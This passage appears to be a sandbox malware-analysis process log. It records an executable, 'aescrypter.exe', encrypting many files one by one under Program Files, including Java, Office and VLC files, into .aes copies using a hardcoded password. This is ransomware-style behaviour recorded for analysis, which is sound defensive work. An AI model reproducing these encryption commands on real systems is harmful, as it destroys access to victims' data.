  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2524
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1548
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1336
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2180
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:300
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2420
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2244
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1204
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:268
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2004
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1692
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2324
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2896
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jre7\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jre7\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\README.txt.aes" "C:\Program Files\Java\jre7\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1520
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2940
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\LimitPush.docx.aes" "C:\Program Files\LimitPush.docx" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2348
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\ResetReceive.png.aes" "C:\Program Files\ResetReceive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2512
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\UpdateOut.xml.aes" "C:\Program Files\UpdateOut.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2660
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\AUTHORS.txt.aes" "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1420
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\COPYING.txt.aes" "C:\Program Files\VideoLAN\VLC\COPYING.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2168
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3036
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:528
- C:\ProgramData\local\aescrypter.exe
